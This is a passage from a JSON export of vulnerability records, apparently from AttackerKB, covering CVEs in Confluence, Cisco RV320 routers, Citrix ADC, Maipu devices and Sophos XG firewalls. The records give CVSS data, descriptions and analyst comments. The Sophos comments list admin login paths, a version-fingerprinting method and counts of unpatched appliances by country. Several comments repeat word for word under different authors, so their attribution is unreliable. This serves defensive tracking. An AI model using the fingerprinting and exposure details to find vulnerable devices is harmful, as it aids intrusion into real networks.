"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2021-02-10T00:00:00", "id": "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "href": "https://attackerkb.com/topics/2uHJW7vbky/confluence-unauthorized-rce-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T18:16:25", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. 
Cisco has released firmware updates that address this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-1653", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2020-10-07T00:00:00", "id": "AKB:D87D8B3A-B6C4-4B59-A2EF-577C30171961", "href": "https://attackerkb.com/topics/O87dIOaTb1/cve-2019-1653", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-18T20:32:03", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n \n**Recent assessments:** \n \n**kevthehermit** at February 22, 2020 12:29am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. 
Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to existing AMIs\n\n**zeroSteiner** at January 02, 2020 3:42pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to existing AMIs\n\n**dmelcher5151** at April 16, 2020 12:56am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to existing AMIs\n\n**bcook-r7** at January 11, 2020 7:23pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. 
Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to existing AMIs\n\n**hrbrmstr** at May 12, 2020 7:56pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to existing AMIs\n\n**gwillcox-r7** at October 20, 2020 5:51pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. 
Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to existing AMIs\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-07-27T00:00:00", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T17:04:24", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. 
The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-1652", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652"], "modified": "2020-10-07T00:00:00", "id": "AKB:75573626-39F0-4E95-928D-7603C6E049EF", "href": "https://attackerkb.com/topics/xrhLRxWPhw/cve-2019-1652", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-20T01:58:34", "description": "The web interface of Maipu MP1800X-50 7.5.3.14\u00ae devices allows remote attackers to obtain sensitive information via the form/formDeviceVerGet 
URI, such as system id, hardware model, hardware version, bootloader version, software version, software image file, compilation time, and system uptime. This is similar to CVE-2019-1653.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-29T00:00:00", "type": "attackerkb", "title": "CVE-2020-13896", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653", "CVE-2020-13896"], "modified": "2020-07-09T00:00:00", "id": "AKB:028F0B15-BECA-49C5-9195-C76E72BD1A88", "href": "https://attackerkb.com/topics/4o9ol6Hy8R/cve-2020-13896", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-22T23:03:33", "description": "A SQL injection issue was found in SFOS 17.0, 17.1, 17.5, and 18.0 before 2020-04-25 on Sophos XG Firewall devices, as exploited in the wild in April 2020. This affected devices configured with either the administration (HTTPS) service or the User Portal exposed on the WAN zone. 
A successful attack may have caused remote code execution that exfiltrated usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords)\n\n \n**Recent assessments:** \n \n**hrbrmstr** at April 27, 2020 12:34pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020 when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, means this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. 
Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are 2 primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and we can. Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. 
\n \n # Sophos Appliances \n 0~ 5,000 10,000 15,000\n 5.01.0.376 x ~ ~ ~ \n 5.01.0.407 x ~ ~ ~ \n 5.01.0.418 x ~ ~ ~ \n 5.01.0.447 x ~ ~ ~ \n 6.01.0.190 x ~ ~ ~ \n 6.01.1.202 xx ~ ~ ~ \n 6.01.2.222 x ~ ~ ~ \n 6.01.3.265 x ~ ~ ~ \n 6.01.4.342 x ~ ~ ~ \n 6.05.0.098 x ~ ~ ~ \n 6.05.0.117 x ~ ~ ~ \n 6.05.1.139 x ~ ~ ~ \n 6.05.2.160 xx ~ ~ ~ \n 6.05.3.183 x ~ ~ ~ \n 6.05.5.233 xx ~ ~ ~ \n 6.05.6.266 xx ~ ~ ~ \n 6.05.7.305 xx ~ ~ ~ \n 6.05.8.320 x ~ ~ ~ \n 17.0.0.32 x ~ ~ ~ \n 17.0.0.80 x ~ ~ ~ \n 17.0.1.98 x ~ ~ ~ \n 17.0.2.116 xx ~ ~ ~ \n 17.0.3.131 x ~ ~ ~ \n 17.0.5.162 xx ~ ~ ~ \n 17.0.6.181 xxxxx ~ ~ ~ \n 17.0.7.191 xxxx ~ ~ ~ \n 17.0.8.209 x ~ ~ ~ \n 17.0.9.217 x ~ ~ ~ \n 17.1.0.152 x ~ ~ ~ \n 17.1.1.175 xx ~ ~ ~ \n 17.1.2.225 xxxx ~ ~ ~ \n 17.1.3.250 xxxxx ~ ~ ~ \n 17.5.0.310 x ~ ~ ~ \n 17.5.0.321 xxx ~ ~ ~ \n 17.5.1.347 xxx ~ ~ ~ \n 17.5.2.381 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.3.372 x ~ ~ ~ \n 17.5.4.429 xxxxxx ~ ~ ~ \n 17.5.5.433 xxxxxxxxx ~ ~ ~ \n 17.5.6.488 xxxxxx ~ ~ ~ \n 17.5.7.511 xxxxxxxxxxxxxxxxxxxxxxxxx ~ ~ \n 17.5.8.539 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.10.620 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 7.5.11.661 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ~ \n 18.0.0.102 x ~ ~ ~ \n 18.0.0.113 x ~ ~ ~ \n 18.0.0.180 x ~ ~ ~ \n 18.0.0.285 x ~ ~ ~ \n 18.0.0.321 xx ~ ~ ~ \n 18.0.0.339 xxxxxx ~ ~ ~ \n 18.0.0.354 xx ~ ~ ~ \n 18.0.1.368 x ~ ~ ~ \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAs of 2020-04-28 ~25% appliances do not leave the \u201cauto-update hotfix\u201d setting on.\n\nOur blog on it: <https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/> | <https://web.archive.org/web/20200428094002/https://blog.rapid7.com/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/>\n\n**busterb** at April 29, 
2020 1:24pm UTC reported:\n\n### Vulnerability Rating/Info\n\nI based the value and exploitability off of the Sophos vulnerability details page: <https://community.sophos.com/kb/en-us/135412> / <https://web.archive.org/web/20200426003614/https://community.sophos.com/kb/en-us/135412>\n\nSophos indicates attackers have been actively compromising these appliances at least as of April 22, 2020, when at least one customer noticed odd field values in their admin console.\n\nGiven that the SQL injection can happen pre-auth, and that both the user-facing and admin-facing interfaces are vulnerable, this is a pretty severe bug.\n\nIt appears to only provide access to usernames and hashed appliance passwords. Credential reuse is likely the culprit for at least the known successful post-SQLi compromise.\n\n### Exposure Analysis\n\nWe found over 72,000 exposed appliances. Many appear to be service provider/telecom/ISP provisioned and sitting on customer segments.\n\nThe top 20 countries (IP geolocation) make up ~80% of the exposure:\n\ncountry | n | pct \n---|---|--- \nUnited States | 9126 | 12.54% \nIndia | 7989 | 10.98% \nGermany | 5433 | 7.47% \nJapan | 4680 | 6.43% \nItaly | 4338 | 5.96% \nAustralia | 4168 | 5.73% \nTurkey | 3740 | 5.14% \nBrazil | 3526 | 4.85% \nFrance | 2567 | 3.53% \nUnited Kingdom | 1822 | 2.50% \nSouth Africa | 1779 | 2.44% \nCanada | 1658 | 2.28% \nSpain | 1644 | 2.26% \nMalaysia | 1496 | 2.06% \nSwitzerland | 1261 | 1.73% \nColombia | 1124 | 1.54% \nThailand | 1087 | 1.49% \nNetherlands | 932 | 1.28% \nTaiwan | 681 | 0.94% \nPortugal | 611 | 0.84% \n \nThere are two primary externally facing HTTP paths:\n\n * Admin @ `https://{host|ip}:{port}/webconsole/webpages/login.jsp` \n\n * User @ `https://{host|ip}:{port}/userportal/webpages/myaccount/login.jsp` \n\n\nI crafted a quick hack study to just see if we could get version info and we can. 
Sophos does the daft thing Microsoft does for OWA and refers to HTML resources by the version/build (e.g.):\n \n \n <link rel=\"stylesheet\"\n href=\"/themes/lite1/css/loginstylesheet.css?ver=17.5.9.577\"\n type=\"text/css\">\n \n\nI\u2019ll be doing a more thorough path study this week but we got back ~12,500 unique (by IP) responses. Here\u2019s the breakdown (TLDR there\u2019s a decent bit of exposure as of Sunday).\n \n \n Sophos XG Appliance Version Distribution \n ~65,000 Appliances Provided Version Details; \n Only ~25% appear to be patched as of 2020-04-27. \n ~ Source: Rapid7 Project Sonar April 2020 HTTPS Studies~ \n \n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-27T00:00:00", "type": "attackerkb", "title": "CVE-2020-12271: Sophos XG Firewall Pre-Auth SQL Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-12271"], "modified": "2021-03-29T00:00:00", "id": "AKB:75221F03-CFA1-478E-9777-568E523E3272", "href": "https://attackerkb.com/topics/CkJJPr77qk/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-07-10T22:31:12", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE&qu